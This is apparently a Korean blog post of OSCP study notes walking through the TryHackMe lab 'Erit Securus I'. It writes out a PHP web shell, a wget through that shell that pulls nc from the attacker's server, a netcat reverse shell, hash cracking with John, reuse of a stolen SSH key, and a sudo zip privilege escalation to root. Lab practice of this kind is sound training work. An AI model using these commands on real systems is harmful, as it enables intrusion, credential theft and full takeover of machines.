OSCP/TryHackMe

[Linux] Erit Securus I (Excellent walkthrough)

우와해커 2020. 6. 4. 14:13

CMS epploit 후 서버 콘솔에 들어가서 php 심플 쉘 생성

echo '<?php system($_GET["c"]);?>'>c.php 


Attacking machine(칼리)에서 현재 디렉토리에 nc 가져오기, python 웹 서버 실행

ln -s $(which nc)
python3 -m http.server 8000

 

심플 웹 쉘로 nc다운로드하게 만들기

http://serverip/files/cmd.php?c=wget http://yourip:8000/nc
http://serverip/files/cmd.php?c=chmod 755 nc

 

리버스 쉘 접속

(* 일부 리눅스에 설치된 nc는 위험하기 때문에 -e옵션이 제거 됨, 해당 옵션 안붙이면 무반응)

서버: nc -lnvp 1234
클라: nc -nv -e /bin/bash [ip]

 

SQLlite3 & John

DB파일 정보 확인 => sqlite3 DB
cmd> file bolt.db

내용읽기
cmd> sqlite3 bold.db
cmd> .tables
cmd> select * from bolt_users;
cmd> quit

해쉬 값 복사 후 john
cmd> john hash.txt -w=/tools/rockyou.txt
snickers		(?)

show옵션: 크랙된 hash 값 다시 보기
john hash.txt --show

 

SSH private key : id_rsa

cmd> ls -al /home/wileec/.ssh
id_rsa

위 파일이 private key임

이것은 어느 SSH 서버에 연결되는 KEY일까?
아까 sqlite DB에 존재했던 사설 IP가 존재함, 연결해보기

현재 wileec 계정에 private key가 존재하므로 
ssh wileec@192.168.100.1

만약 나의 칼리에서 접속하고 싶다면
id_rsa를 다운로드 한 후 권한을 600으로 변경,
-i 옵션으로 private key를 추가한다.

ssh wileec wileec@192.168.100.1 -i ./id_rsa

 

권한상승

- GTFobin 활용: zip, sudo 

gtfobins.github.io/gtfobins/zip/

 

sudo -l
(jsmith) NOPASSWD: /usr/bin/zip

jsmith 유저로 비번없이 zip명령어 사용가능함
sudo -u jsmith /usr/bin/zip

cmd> TF=$(mktemp -u)
cmd> sudo -u jsmith /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
cmd> sudo -u jsmith rm $TF

jsmith sudo 권한 체크 
cmd> whoami
jsmith

cmd> sudo -l
(ALL : ALL) NOPASSWD: ALL

root 권한 상승
cmd> sudo -i
root@Securus:~# 

 

'OSCP > TryHackMe' 카테고리의 다른 글

[Linux] Common Linux Privesc  (0) 2020.06.08
[Linux] Network Service  (0) 2020.06.05
[Linux] Borderlands (미완료, CTF스타일, Pivot연습용)  (0) 2020.06.03
[Linux] MrRobot  (0) 2020.05.13
Hacking with Powershell  (0) 2020.05.06